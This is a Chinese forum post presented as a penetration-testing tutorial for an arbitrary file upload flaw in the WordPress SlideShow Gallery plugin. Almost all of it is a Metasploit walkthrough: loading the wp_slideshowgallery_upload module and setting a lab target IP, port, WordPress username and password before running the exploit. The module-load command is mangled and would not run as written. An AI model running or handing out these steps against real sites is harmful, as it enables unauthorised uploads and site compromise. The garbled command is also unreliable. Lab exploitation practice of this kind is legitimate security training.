WordPress实战渗透测试:利用插件(轮播幻灯片)漏洞来进行文件上传(任意文件上传漏洞)

zevseo
4260zevseo大版主
2018-09-11 03:15:22
4260 2018-09-11 03:15:22
WordPress SlideShow Gallery插件包含绕过过身份验证的任意文件上传漏洞。攻击者可以将任意文件上传到上传文件夹。由于插件使用自己的文件上传机制而不是WordPress API,因此可以上传任何文件类型。利用目标
WordPress的
需求
攻击者:kali Linux
受害者PC:WordPress
打开Kali终端类型  msfconsole

描述:WordPress实战渗透测试:利用插件SlideShow Gallery来进行文件上传(任意文件上传漏洞)


现在输入  exploit use / unix / webapp / wp_slideshowgallery_upload
msf exploit (wp_slideshowgallery_upload)>set targeturi /
msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (wp_slideshowgallery_upload)>set rport 80
msf exploit (wp_slideshowgallery_upload)>set wp_user user
msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami
msf exploit (wp_slideshowgallery_upload)>exploit    
WordPress实战渗透测试:利用插件SlideShow Gallery来进行文件上传(任意文件上传漏洞)

描述:WordPress实战渗透测试:利用插件SlideShow Gallery来进行文件上传(任意文件上传漏洞)


本文标题:WordPress实战渗透测试:利用插件(轮播幻灯片)漏洞来进行文件上传(任意文件上传漏洞)
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2322.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan